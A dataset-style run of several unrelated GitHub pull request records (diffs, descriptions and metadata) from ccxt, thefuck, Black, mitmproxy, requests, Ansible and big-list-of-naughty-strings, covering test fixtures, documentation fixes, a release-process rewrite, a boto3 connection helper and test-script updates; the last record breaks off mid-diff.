"https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + "market", + "buy", + 0.2 + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Buy\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"baseCoin\",\"qty\":\"0.2\"}" + }, + { + "description": "Create market sell with cost (UTA only)", + "method": "createOrder", + "url": "https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + "market", + "sell", + 0.2, + 10 + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"quoteCoin\",\"qty\":\"2\"}" + }, + { + "description": "market sell with cost in params (UTA only)", + "method": "createOrder", + "url": "https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + "market", + "sell", + null, + null, + { + "cost": 3 + } + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"quoteCoin\",\"qty\":\"3\"}" } ], "createMarketBuyOrderWithCost": [ @@ -288,6 +332,18 @@ "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Buy\",\"orderType\":\"Market\",\"category\":\"spot\",\"qty\":\"10\"}" } ], + "createMarketSellOrderWithCost": [ + { + "description": "market sell order with cost (UTA only)", + "method": "createMarkeSellOrderWithCost", + "url": "https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + 5 + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"quoteCoin\",\"qty\":\"5\"}" + } + ], "createOrders": [ { "description": "Swap create orders", diff --git a/ts/src/test/test.ts b/ts/src/test/test.ts index cbe5258b6d16..3d4ebe0f34e7 100644 --- a/ts/src/test/test.ts +++ b/ts/src/test/test.ts @@ -1236,6 +1236,9 @@ export default class testMainClass extends baseMainTestClass { const results = methods[method]; for (let j = 0; j < results.length; j++) { const result = results[j]; + const oldExchangeOptions = exchange.options; // snapshot options; + const testExchangeOptions = exchange.safeValue (result, 'options', {}); + exchange.options = exchange.deepExtend (oldExchangeOptions, testExchangeOptions); // custom options to be used in the tests const description = exchange.safeValue (result, 'description'); if ((testName !== undefined) && (testName !== description)) { continue; @@ -1247,6 +1250,8 @@ export default class testMainClass extends baseMainTestClass { const type = exchange.safeString (exchangeData, 'outputType'); const skipKeys = exchange.safeValue (exchangeData, 'skipKeys', []); await this.testMethodStatically (exchange, method, result, type, skipKeys); + // reset options + exchange.options = oldExchangeOptions; } } await close (exchange); @@ -1264,6 +1269,9 @@ export default class testMainClass extends baseMainTestClass { for (let j = 0; j < results.length; j++) { const result = results[j]; const description = exchange.safeValue (result, 'description'); + const oldExchangeOptions = exchange.options; // snapshot options; + const testExchangeOptions = exchange.safeValue (result, 'options', {}); + exchange.options = exchange.deepExtend (oldExchangeOptions, testExchangeOptions); // custom options to be used in the tests const isDisabled = exchange.safeValue (result, 'disabled', false); if (isDisabled) { continue; @@ -1277,6 +1285,8 @@ export default class testMainClass extends baseMainTestClass { } const skipKeys = exchange.safeValue (exchangeData, 'skipKeys', []); await this.testResponseStatically (exchange, method, skipKeys, result); + // reset options + exchange.options = oldExchangeOptions; } } await close (exchange);
- UTA accounts can place market orders using the base or quote amount on both sides (buy and sell)
https://api.github.com/repos/ccxt/ccxt/pulls/20965
2024-01-25T16:51:57Z
2024-01-25T17:42:53Z
2024-01-25T17:42:53Z
2024-01-25T17:42:53Z
3,239
ccxt/ccxt
13,061
Fix grammar and spelling errors
diff --git a/README.md b/README.md index 4f396ce95..1b398a6ac 100644 --- a/README.md +++ b/README.md @@ -243,7 +243,7 @@ following rules are enabled by default: * `git_pull_clone` &ndash; clones instead of pulling when the repo does not exist; * `git_pull_uncommitted_changes` &ndash; stashes changes before pulling and pops them afterwards; * `git_push` &ndash; adds `--set-upstream origin $branch` to previous failed `git push`; -* `git_push_different_branch_names` &ndash; fixes pushes when local brach name does not match remote branch name; +* `git_push_different_branch_names` &ndash; fixes pushes when local branch name does not match remote branch name; * `git_push_pull` &ndash; runs `git pull` when `push` was rejected; * `git_push_without_commits` &ndash; Creates an initial commit if you forget and only `git add .`, when setting up a new project; * `git_rebase_no_changes` &ndash; runs `git rebase --skip` instead of `git rebase --continue` when there are no changes; @@ -268,7 +268,7 @@ following rules are enabled by default: * `has_exists_script` &ndash; prepends `./` when script/binary exists; * `heroku_multiple_apps` &ndash; add `--app <app>` to `heroku` commands like `heroku pg`; * `heroku_not_command` &ndash; fixes wrong `heroku` commands like `heroku log`; -* `history` &ndash; tries to replace command with most similar command from history; +* `history` &ndash; tries to replace command with the most similar command from history; * `hostscli` &ndash; tries to fix `hostscli` usage; * `ifconfig_device_not_found` &ndash; fixes wrong device names like `wlan0` to `wlp2s0`; * `java` &ndash; removes `.java` extension when running Java programs; @@ -283,7 +283,7 @@ following rules are enabled by default: * `man_no_space` &ndash; fixes man commands without spaces, for example `mandiff`; * `mercurial` &ndash; fixes wrong `hg` commands; * `missing_space_before_subcommand` &ndash; fixes command with missing space like `npminstall`; -* `mkdir_p` &ndash; adds `-p` when you try to create a directory without parent; +* `mkdir_p` &ndash; adds `-p` when you try to create a directory without a parent; * `mvn_no_command` &ndash; adds `clean package` to `mvn`; * `mvn_unknown_lifecycle_phase` &ndash; fixes misspelled life cycle phases with `mvn`; * `npm_missing_script` &ndash; fixes `npm` custom script name in `npm run-script <script>`; @@ -302,16 +302,16 @@ following rules are enabled by default: * `python_execute` &ndash; appends missing `.py` when executing Python files; * `python_module_error` &ndash; fixes ModuleNotFoundError by trying to `pip install` that module; * `quotation_marks` &ndash; fixes uneven usage of `'` and `"` when containing args'; -* `path_from_history` &ndash; replaces not found path with similar absolute path from history; +* `path_from_history` &ndash; replaces not found path with a similar absolute path from history; * `react_native_command_unrecognized` &ndash; fixes unrecognized `react-native` commands; * `remove_shell_prompt_literal` &ndash; remove leading shell prompt symbol `$`, common when copying commands from documentations; -* `remove_trailing_cedilla` &ndash; remove trailing cedillas `ç`, a common typo for european keyboard layouts; +* `remove_trailing_cedilla` &ndash; remove trailing cedillas `ç`, a common typo for European keyboard layouts; * `rm_dir` &ndash; adds `-rf` when you try to remove a directory; * `scm_correction` &ndash; corrects wrong scm like `hg log` to `git log`; * `sed_unterminated_s` &ndash; adds missing '/' to `sed`'s `s` commands; * `sl_ls` &ndash; changes `sl` to `ls`; * `ssh_known_hosts` &ndash; removes host from `known_hosts` on warning; -* `sudo` &ndash; prepends `sudo` to previous command if it failed because of permissions; +* `sudo` &ndash; prepends `sudo` to the previous command if it failed because of permissions; * `sudo_command_from_user_path` &ndash; runs commands from users `$PATH` with `sudo`; * `switch_lang` &ndash; switches command from your local layout to en; * `systemctl` &ndash; correctly orders parameters of confusing `systemctl`; @@ -322,7 +322,7 @@ following rules are enabled by default: * `tsuru_not_command` &ndash; fixes wrong `tsuru` commands like `tsuru shell`; * `tmux` &ndash; fixes `tmux` commands; * `unknown_command` &ndash; fixes hadoop hdfs-style "unknown command", for example adds missing '-' to the command on `hdfs dfs ls`; -* `unsudo` &ndash; removes `sudo` from previous command if a process refuses to run on super user privilege. +* `unsudo` &ndash; removes `sudo` from previous command if a process refuses to run on superuser privilege. * `vagrant_up` &ndash; starts up the vagrant instance; * `whois` &ndash; fixes `whois` command; * `workon_doesnt_exists` &ndash; fixes `virtualenvwrapper` env name os suggests to create new. @@ -425,15 +425,15 @@ Several *The Fuck* parameters can be changed in the file `$XDG_CONFIG_HOME/thefu * `rules` &ndash; list of enabled rules, by default `thefuck.const.DEFAULT_RULES`; * `exclude_rules` &ndash; list of disabled rules, by default `[]`; * `require_confirmation` &ndash; requires confirmation before running new command, by default `True`; -* `wait_command` &ndash; max amount of time in seconds for getting previous command output; +* `wait_command` &ndash; the max amount of time in seconds for getting previous command output; * `no_colors` &ndash; disable colored output; * `priority` &ndash; dict with rules priorities, rule with lower `priority` will be matched first; * `debug` &ndash; enables debug output, by default `False`; -* `history_limit` &ndash; numeric value of how many history commands will be scanned, like `2000`; +* `history_limit` &ndash; the numeric value of how many history commands will be scanned, like `2000`; * `alter_history` &ndash; push fixed command to history, by default `True`; * `wait_slow_command` &ndash; max amount of time in seconds for getting previous command output if it in `slow_commands` list; * `slow_commands` &ndash; list of slow commands; -* `num_close_matches` &ndash; maximum number of close matches to suggest, by default `3`. +* `num_close_matches` &ndash; the maximum number of close matches to suggest, by default `3`. * `excluded_search_path_prefixes` &ndash; path prefixes to ignore when searching for commands, by default `[]`. An example of `settings.py`: @@ -457,16 +457,16 @@ Or via environment variables: * `THEFUCK_RULES` &ndash; list of enabled rules, like `DEFAULT_RULES:rm_root` or `sudo:no_command`; * `THEFUCK_EXCLUDE_RULES` &ndash; list of disabled rules, like `git_pull:git_push`; * `THEFUCK_REQUIRE_CONFIRMATION` &ndash; require confirmation before running new command, `true/false`; -* `THEFUCK_WAIT_COMMAND` &ndash; max amount of time in seconds for getting previous command output; +* `THEFUCK_WAIT_COMMAND` &ndash; the max amount of time in seconds for getting previous command output; * `THEFUCK_NO_COLORS` &ndash; disable colored output, `true/false`; * `THEFUCK_PRIORITY` &ndash; priority of the rules, like `no_command=9999:apt_get=100`, rule with lower `priority` will be matched first; * `THEFUCK_DEBUG` &ndash; enables debug output, `true/false`; * `THEFUCK_HISTORY_LIMIT` &ndash; how many history commands will be scanned, like `2000`; * `THEFUCK_ALTER_HISTORY` &ndash; push fixed command to history `true/false`; -* `THEFUCK_WAIT_SLOW_COMMAND` &ndash; max amount of time in seconds for getting previous command output if it in `slow_commands` list; +* `THEFUCK_WAIT_SLOW_COMMAND` &ndash; the max amount of time in seconds for getting previous command output if it in `slow_commands` list; * `THEFUCK_SLOW_COMMANDS` &ndash; list of slow commands, like `lein:gradle`; -* `THEFUCK_NUM_CLOSE_MATCHES` &ndash; maximum number of close matches to suggest, like `5`. +* `THEFUCK_NUM_CLOSE_MATCHES` &ndash; the maximum number of close matches to suggest, like `5`. * `THEFUCK_EXCLUDED_SEARCH_PATH_PREFIXES` &ndash; path prefixes to ignore when searching for commands, by default `[]`. For example:
https://api.github.com/repos/nvbn/thefuck/pulls/1193
2021-05-02T21:10:42Z
2021-06-29T19:25:02Z
2021-06-29T19:25:02Z
2021-06-29T19:43:34Z
2,170
nvbn/thefuck
30,636
Improve & update release process to reflect recent changes
diff --git a/docs/contributing/release_process.md b/docs/contributing/release_process.md index 6a4b8680808..be9b08a6c82 100644 --- a/docs/contributing/release_process.md +++ b/docs/contributing/release_process.md @@ -1,40 +1,85 @@ # Release process -_Black_ has had a lot of work automating its release process. This document sets out to -explain what everything does and how to release _Black_ using said automation. - -## Cutting a Release - -To cut a release, you must be a _Black_ maintainer with `GitHub Release` creation -access. Using this access, the release process is: - -1. Cut a new PR editing `CHANGES.md` and the docs to version the latest changes +_Black_ has had a lot of work done into standardizing and automating its release +process. This document sets out to explain how everything works and how to release +_Black_ using said automation. + +## Release cadence + +**We aim to release whatever is on `main` every 1-2 months.** This ensures merged +improvements and bugfixes are shipped to users reasonably quickly, while not massively +fracturing the user-base with too many versions. This also keeps the workload on +maintainers consistent and predictable. + +If there's not much new on `main` to justify a release, it's acceptable to skip a +month's release. Ideally January releases should not be skipped because as per our +[stability policy](labels/stability-policy), the first release in a new calendar year +may make changes to the _stable_ style. While the policy applies to the first release +(instead of only January releases), confining changes to the stable style to January +will keep things predictable (and nicer) for users. + +Unless there is a serious regression or bug that requires immediate patching, **there +should not be more than one release per month**. While version numbers are cheap, +releases require a maintainer to both commit to do the actual cutting of a release, but +also to be able to deal with the potential fallout post-release. Releasing more +frequently than monthly nets rapidly diminishing returns. + +## Cutting a release + +**You must have `write` permissions for the _Black_ repository to cut a release.** + +The 10,000 foot view of the release process is that you prepare a release PR and then +publish a [GitHub Release]. This triggers [release automation](#release-workflows) that +builds all release artifacts and publishes them to the various platforms we publish to. + +To cut a release: + +1. Determine the release's version number + - **_Black_ follows the [CalVer] versioning standard using the `YY.M.N` format** + - So unless there already has been a release during this month, `N` should be `0` + - Example: the first release in January, 2022 → `22.1.0` +1. File a PR editing `CHANGES.md` and the docs to version the latest changes + 1. Replace the `## Unreleased` header with the version number 1. Remove any empty sections for the current release - 2. Add a new empty template for the next release (template below) - 3. Example PR: [#2616](https://github.com/psf/black/pull/2616) - 4. Example title: `Update CHANGES.md for XX.X release` -2. Once the release PR is merged ensure all CI passes - 1. If not, ensure there is an Issue open for the cause of failing CI (generally we'd - want this fixed before cutting a release) -3. Open `CHANGES.md` and copy the _raw markdown_ of the latest changes to use in the - description of the GitHub Release. -4. Go and [cut a release](https://github.com/psf/black/releases) using the GitHub UI so - that all workflows noted below are triggered. - 1. The release version and tag should be the [CalVer](https://calver.org) version - _Black_ used for the current release e.g. `21.6` / `21.5b1` - 2. _Black_ uses [setuptools scm](https://pypi.org/project/setuptools-scm/) to pull - the current version for the package builds and release. -5. Once the release is cut, you're basically done. It's a good practice to go and watch - to make sure all the [GitHub Actions](https://github.com/psf/black/actions) pass, - although you should receive an email to your registered GitHub email address should - one fail. - 1. You should see all the release workflows and lint/unittests workflows running on - the new tag in the Actions UI - -If anything fails, please go read the respective action's log output and configuration -file to reverse engineer your way to a fix/soluton. - -## Changelog template + 1. (_optional_) Read through and copy-edit the changelog (eg. by moving entries, + fixing typos, or rephrasing entries) + 1. Add a new empty template for the next release above + ([template below](#changelog-template)) + 1. Update references to the latest version in + {doc}`/integrations/source_version_control` and + {doc}`/usage_and_configuration/the_basics` + - Example PR: [GH-3139] +1. Once the release PR is merged, wait until all CI passes + - If CI does not pass, **stop** and investigate the failure(s) as generally we'd want + to fix failing CI before cutting a release +1. [Draft a new GitHub Release][new-release] + 1. Click `Choose a tag` and type in the version number, then select the + `Create new tag: YY.M.N on publish` option that appears + 1. Verify that the new tag targets the `main` branch + 1. You can leave the release title blank, GitHub will default to the tag name + 1. Copy and paste the _raw changelog Markdown_ for the current release into the + description box +1. Publish the GitHub Release, triggering [release automation](#release-workflows) that + will handle the rest +1. At this point, you're basically done. It's good practice to go and [watch and verify + that all the release workflows pass][black-actions], although you will receive a + GitHub notification should something fail. + - If something fails, don't panic. Please go read the respective workflow's logs and + configuration file to reverse-engineer your way to a fix/solution. + +Congratulations! You've successfully cut a new release of _Black_. Go and stand up and +take a break, you deserve it. + +```{important} +Once the release artifacts reach PyPI, you may see new issues being filed indicating +regressions. While regressions are not great, they don't automatically mean a hotfix +release is warranted. Unless the regressions are serious and impact many users, a hotfix +release is probably unnecessary. + +In the end, use your best judgement and ask other maintainers for their thoughts. +``` + +### Changelog template Use the following template for a clean changelog after the release: @@ -45,7 +90,7 @@ Use the following template for a clean changelog after the release: <!-- Include any especially major or disruptive changes here --> -### Style +### Stable style <!-- Changes that affect Black's stable style --> @@ -53,93 +98,115 @@ Use the following template for a clean changelog after the release: <!-- Changes that affect Black's preview style --> -### _Blackd_ - -<!-- Changes to blackd --> - ### Configuration <!-- Changes to how Black can be configured --> -### Documentation +### Packaging -<!-- Major changes to documentation and policies. Small docs changes - don't need a changelog entry. --> +<!-- Changes to how Black is packaged, such as dependency requirements --> -### Integrations +### Parser -<!-- For example, Docker, GitHub Actions, pre-commit, editors --> +<!-- Changes to the parser or to version autodetection --> + +### Performance + +<!-- Changes that improve Black's performance. --> ### Output <!-- Changes to Black's terminal output and error messages --> -### Packaging - -<!-- Changes to how Black is packaged, such as dependency requirements --> +### _Blackd_ -### Parser +<!-- Changes to blackd --> -<!-- Changes to the parser or to version autodetection --> +### Integrations -### Performance +<!-- For example, Docker, GitHub Actions, pre-commit, editors --> -<!-- Changes that improve Black's performance. --> +### Documentation +<!-- Major changes to documentation and policies. Small docs changes + don't need a changelog entry. --> ``` ## Release workflows -All _Blacks_'s automation workflows use GitHub Actions. All workflows are therefore -configured using `.yml` files in the `.github/workflows` directory of the _Black_ +All of _Black_'s release automation uses [GitHub Actions]. All workflows are therefore +configured using YAML files in the `.github/workflows` directory of the _Black_ repository. +They are triggered by the publication of a [GitHub Release]. + Below are descriptions of our release workflows. -### Docker +### Publish to PyPI + +This is our main workflow. It builds an [sdist] and [wheels] to upload to PyPI where the +vast majority of users will download Black from. It's divided into three job groups: + +#### sdist + pure wheel -This workflow uses the QEMU powered `buildx` feature of docker to upload a `arm64` and -`amd64`/`x86_64` build of the official _Black_ docker image™. +This single job builds the sdist and pure Python wheel (i.e., a wheel that only contains +Python code) using [build] and then uploads them to PyPI using [twine]. These artifacts +are general-purpose and can be used on basically any platform supported by Python. -- Currently this workflow uses an API Token associated with @cooperlees account +#### mypyc wheels (…) -### pypi_upload +We use [mypyc] to compile _Black_ into a CPython C extension for significantly improved +performance. Wheels built with mypyc are platform and Python version specific. +[Supported platforms are documented in the FAQ](labels/mypyc-support). -This workflow builds a Python -[sdist](https://docs.python.org/3/distutils/sourcedist.html) and -[wheel](https://pythonwheels.com) using the latest -[setuptools](https://pypi.org/project/setuptools/) and -[wheel](https://pypi.org/project/wheel/) modules. +These matrix jobs use [cibuildwheel] which handles the complicated task of building C +extensions for many environments for us. Since building these wheels is slow, there are +multiple mypyc wheels jobs (hence the term "matrix") that build for a specific platform +(as noted in the job name in parentheses). -It will then use [twine](https://pypi.org/project/twine/) to upload both release formats -to PyPI for general downloading of the _Black_ Python package. This is where -[pip](https://pypi.org/project/pip/) looks by default. +Like the previous job group, the built wheels are uploaded to PyPI using [twine]. -- Currently this workflow uses an API token associated with @ambv's PyPI account +#### Update stable branch -### Upload self-contained binaries +So this job doesn't _really_ belong here, but updating the `stable` branch after the +other PyPI jobs pass (they must pass for this job to start) makes the most sense. This +saves us from remembering to update the branch sometime after cutting the release. -This workflow builds self-contained binaries for multiple platforms. This allows people -to download the executable for their platform and run _Black_ without a -[Python Runtime](https://wiki.python.org/moin/PythonImplementations) installed. +- _Currently this workflow uses an API token associated with @ambv's PyPI account_ -The created binaries are attached/stored on the associated -[GitHub Release](https://github.com/psf/black/releases) for download over _IPv4 only_ -(GitHub still does not have IPv6 access 😢). +### Publish executables -## Moving the `stable` tag +This workflow builds native executables for multiple platforms using [PyInstaller]. This +allows people to download the executable for their platform and run _Black_ without a +[Python runtime](https://wiki.python.org/moin/PythonImplementations) installed. -_Black_ provides a stable tag for people who want to move along as _Black_ developers -deem the newest version reliable. Here the _Black_ developers will move once the release -has been problem free for at least ~24 hours from release. Given the large _Black_ -userbase we hear about bad bugs quickly. We do strive to continually improve our CI too. +The created binaries are stored on the associated GitHub Release for download over _IPv4 +only_ (GitHub still does not have IPv6 access 😢). -### Tag moving process +### docker -#### stable +This workflow uses the QEMU powered `buildx` feature of Docker to upload an `arm64` and +`amd64`/`x86_64` build of the official _Black_ Docker image™. -From a rebased `main` checkout: +- _Currently this workflow uses an API Token associated with @cooperlees account_ + +```{note} +This also runs on each push to `main`. +``` -1. `git tag -f stable VERSION_TAG` - 1. e.g. `git tag -f stable 21.5b1` -1. `git push --tags -f` +[black-actions]: https://github.com/psf/black/actions +[build]: https://pypa-build.readthedocs.io/ +[calver]: https://calver.org +[cibuildwheel]: https://cibuildwheel.readthedocs.io/ +[gh-3139]: https://github.com/psf/black/pull/3139 +[github actions]: https://github.com/features/actions +[github release]: https://github.com/psf/black/releases +[new-release]: https://github.com/psf/black/releases/new +[mypyc]: https://mypyc.readthedocs.io/ +[mypyc-platform-support]: + /faq.html#what-is-compiled-yes-no-all-about-in-the-version-output +[pyinstaller]: https://www.pyinstaller.org/ +[sdist]: + https://packaging.python.org/en/latest/glossary/#term-Source-Distribution-or-sdist +[twine]: https://github.com/features/actions +[wheels]: https://packaging.python.org/en/latest/glossary/#term-Wheel diff --git a/docs/faq.md b/docs/faq.md index b2fe42de282..aeb9634789f 100644 --- a/docs/faq.md +++ b/docs/faq.md @@ -114,6 +114,8 @@ errors is not a goal. It can format all code accepted by CPython (if you find an where that doesn't hold, please report a bug!), but it may also format some code that CPython doesn't accept. +(labels/mypyc-support)= + ## What is `compiled: yes/no` all about in the version output? While _Black_ is indeed a pure Python project, we use [mypyc] to compile _Black_ into a diff --git a/docs/the_black_code_style/index.md b/docs/the_black_code_style/index.md index c7f29af6c73..e5967be2db4 100644 --- a/docs/the_black_code_style/index.md +++ b/docs/the_black_code_style/index.md @@ -19,6 +19,8 @@ style aspects and details might change according to the stability policy present below. Ongoing style considerations are tracked on GitHub with the [design](https://github.com/psf/black/labels/T%3A%20design) issue label. +(labels/stability-policy)= + ## Stability Policy The following policy applies for the _Black_ code style, in non pre-release versions of
### Description - Formalise release cadence guidelines - Overhaul release steps to be easier to follow and more thorough - Reorder changelog template to something more sensible - Update release automation docs to reflect recent improvements (notably the addition of in-repo mypyc wheel builds) ### Review notes See https://ichard26-testblackdocs.readthedocs.io/en/overhaul-release-doc/contributing/release_process.html for a preview of this newly rewritten document. @felix-hilden given you might be RMing the next release, it'd be great if you could check that this all makes sense to you! Thank you! This also depends on #3223 as this PR assumes it's already been landed. Anyway I'll note my other potential points of discussion as comments. ### Checklist - did you ... - [x] Add a CHANGELOG entry if necessary? -> this is internal only so n/a - [x] Add / update tests if necessary? -> n/a - [x] Add new / update outdated documentation? I heard this is a 100% documentation patch :) <!-- Just as a reminder, everyone in all psf/black spaces including PRs must follow the PSF Code of Conduct (link below). Finally, once again thanks for your time and effort. If you have any feedback in regards to your experience contributing here, please let us know! Helpful links: PSF COC: https://www.python.org/psf/conduct/ Contributing docs: https://black.readthedocs.io/en/latest/contributing/index.html Chat on Python Discord: https://discord.gg/RtVdv86PrH -->
https://api.github.com/repos/psf/black/pulls/3242
2022-08-28T02:34:38Z
2022-08-31T21:46:49Z
2022-08-31T21:46:48Z
2022-08-31T21:47:40Z
3,676
psf/black
23,984
typo
diff --git a/docs/src/content/concepts-commands.md b/docs/src/content/concepts-commands.md index 73e8adaed4..d826ec89e0 100644 --- a/docs/src/content/concepts-commands.md +++ b/docs/src/content/concepts-commands.md @@ -18,7 +18,7 @@ and many of the built-in argument types - give it a try. The canonical reference for commands is the `--commands` flag, which is exposed by each of the mitmproxy tools. Passing this flag will dump an annotated list of all registered commands, their arguments and their return values to screen. In -mimtproxy console you can also view a palette of all commands in the command +mitmproxy console you can also view a palette of all commands in the command browser (by default accessible with the `C` key binding). # Working with Flows
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/5062
2022-01-15T23:37:11Z
2022-01-15T23:37:58Z
2022-01-15T23:37:57Z
2022-01-15T23:37:58Z
195
mitmproxy/mitmproxy
27,448
Don't mention pip as the reason for supporting py2
diff --git a/docs/community/faq.rst b/docs/community/faq.rst index 177eaec4eb..fbdd9dadcc 100644 --- a/docs/community/faq.rst +++ b/docs/community/faq.rst @@ -62,10 +62,7 @@ Python 2 Support? Yes! We do not have immediate plans to `sunset <https://www.python.org/doc/sunset-python-2/>`_ our support for Python -2.7. We understand that we have a large user base with varying needs, -and intend to maintain Python 2.7 support within Requests until `pip -stops supporting Python 2.7 (there's no estimated date on that yet) -<https://pip.pypa.io/en/latest/development/release-process/#python-2-support>`_. +2.7. We understand that we have a large user base with varying needs. That said, it is *highly* recommended users migrate to Python 3.6+ since Python 2.7 is no longer receiving bug fixes or security updates as of January 1, 2020.
since pip no longer supports Python 2
https://api.github.com/repos/psf/requests/pulls/5940
2021-09-21T22:34:57Z
2021-09-21T23:22:12Z
2021-09-21T23:22:12Z
2021-12-21T00:00:43Z
242
psf/requests
32,395
Connection function for boto3
diff --git a/lib/ansible/module_utils/ec2.py b/lib/ansible/module_utils/ec2.py index 417e1b9521b664..9d406d0890a050 100644 --- a/lib/ansible/module_utils/ec2.py +++ b/lib/ansible/module_utils/ec2.py @@ -46,6 +46,19 @@ 'us-gov-west-1', ] +def boto3_conn(module, conn_type=None, resource=None, region=None, endpoint=None, **params): + if conn_type not in ['both', 'resource', 'client']: + module.fail_json(msg='There is an issue in the code of the module. You must specify either both, resource or client to the conn_type parameter in the boto3_conn function call') + + resource = boto3.session.Session().resource(resource, region_name=region, endpoint_url=endpoint, **params) + client = resource.meta.client + + if conn_type == 'resource': + return resource + elif conn_type == 'client': + return client + else: + return client, resource def aws_common_argument_spec(): return dict( @@ -72,7 +85,7 @@ def boto_supports_profile_name(): return hasattr(boto.ec2.EC2Connection, 'profile_name') -def get_aws_connection_info(module): +def get_aws_connection_info(module, boto3=False): # Check module args for credentials, then check environment vars # access_key @@ -131,19 +144,31 @@ def get_aws_connection_info(module): # in case security_token came in as empty string security_token = None - boto_params = dict(aws_access_key_id=access_key, - aws_secret_access_key=secret_key, - security_token=security_token) + if boto3: + boto_params = dict(aws_access_key_id=access_key, + aws_secret_access_key=secret_key, + aws_session_token=security_token) + if validate_certs: + boto_params['verify'] = validate_certs - # profile_name only works as a key in boto >= 2.24 - # so only set profile_name if passed as an argument - if profile_name: - if not boto_supports_profile_name(): - module.fail_json("boto does not support profile_name before 2.24") - boto_params['profile_name'] = profile_name + if profile_name: + boto_params['profile_name'] = profile_name - if validate_certs and HAS_LOOSE_VERSION and LooseVersion(boto.Version) >= LooseVersion("2.6.0"): - boto_params['validate_certs'] = validate_certs + + else: + boto_params = dict(aws_access_key_id=access_key, + aws_secret_access_key=secret_key, + security_token=security_token) + + # profile_name only works as a key in boto >= 2.24 + # so only set profile_name if passed as an argument + if profile_name: + if not boto_supports_profile_name(): + module.fail_json("boto does not support profile_name before 2.24") + boto_params['profile_name'] = profile_name + + if validate_certs and HAS_LOOSE_VERSION and LooseVersion(boto.Version) >= LooseVersion("2.6.0"): + boto_params['validate_certs'] = validate_certs return region, ec2_url, boto_params
This is adding a simple connection function for boto3. Inside of a module's code, it would be used like: ``` python region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True) ec2_client, ec2_res = boto3_conn(module, conn_type='both', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_kwargs) all_vpcs = ec2_client.describe_vpcs() ``` There are two noticeable pieces that make it functionally different than the current connection functions: - `conn_type`: refers to the type of session you want, whether a high level resource session or a low level client session, or both. The boto3 docs regarding sessions are [here](http://boto3.readthedocs.org/en/latest/reference/core/session.html) - `resource`: this is the AWS resource you want to communicate such as ec2, s3, autoscaling, etc. Full list is [here](http://boto3.readthedocs.org/en/latest/reference/services/index.html) This should allow everyone to start using boto3 for module development/enhancement right away.
https://api.github.com/repos/ansible/ansible/pulls/11591
2015-07-14T21:39:17Z
2015-07-23T19:54:28Z
2015-07-23T19:54:28Z
2019-04-26T15:46:49Z
765
ansible/ansible
49,210
Unicode string that often causes rendering issues
diff --git a/blns.txt b/blns.txt index 530606a..29a53f6 100644 --- a/blns.txt +++ b/blns.txt @@ -116,13 +116,14 @@ INF ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя ٠١٢٣٤٥٦٧٨٩ -# Unicode Subscript/Superscript +# Unicode Subscript/Superscript/Accents # # Strings which contain unicode subscripts/superscripts; can cause rendering issues ⁰⁴⁵ ₀₁₂ ⁰⁴⁵₀₁₂ +ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ # Quotation Marks #
Adding string containing three ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ characters that often causes rendering issues.
https://api.github.com/repos/minimaxir/big-list-of-naughty-strings/pulls/102
2016-12-19T14:27:32Z
2017-01-15T20:49:17Z
2017-01-15T20:49:17Z
2017-01-15T20:49:17Z
375
minimaxir/big-list-of-naughty-strings
4,928
Fix tests to use ANSIBLE_TEST_PYTHON_INTERPRETER.
diff --git a/test/integration/targets/groupby_filter/runme.sh b/test/integration/targets/groupby_filter/runme.sh index 8f9fce9b568bc4..f65cc008f685a8 100755 --- a/test/integration/targets/groupby_filter/runme.sh +++ b/test/integration/targets/groupby_filter/runme.sh @@ -7,12 +7,7 @@ MYTMPDIR=$(mktemp -d 2>/dev/null || mktemp -d -t 'mytmpdir') trap 'rm -rf "${MYTMPDIR}"' EXIT -# This is needed for the ubuntu1604py3 tests -# Ubuntu patches virtualenv to make the default python2 -# but for the python3 tests we need virtualenv to use python3 -PYTHON=$("python${ANSIBLE_TEST_PYTHON_VERSION:-}" -c "import sys; print(sys.executable)") - -virtualenv --system-site-packages --python "${PYTHON}" "${MYTMPDIR}/jinja2" +virtualenv --system-site-packages --python "${ANSIBLE_TEST_PYTHON_INTERPRETER}" "${MYTMPDIR}/jinja2" source "${MYTMPDIR}/jinja2/bin/activate" diff --git a/test/integration/targets/template_jinja2_latest/runme.sh b/test/integration/targets/template_jinja2_latest/runme.sh index e0fd0882b7d276..88df29622415ea 100755 --- a/test/integration/targets/template_jinja2_latest/runme.sh +++ b/test/integration/targets/template_jinja2_latest/runme.sh @@ -7,12 +7,7 @@ MYTMPDIR=$(mktemp -d 2>/dev/null || mktemp -d -t 'mytmpdir') trap 'rm -rf "${MYTMPDIR}"' EXIT -# This is needed for the ubuntu1604py3 tests -# Ubuntu patches virtualenv to make the default python2 -# but for the python3 tests we need virtualenv to use python3 -PYTHON=$("python${ANSIBLE_TEST_PYTHON_VERSION:-}" 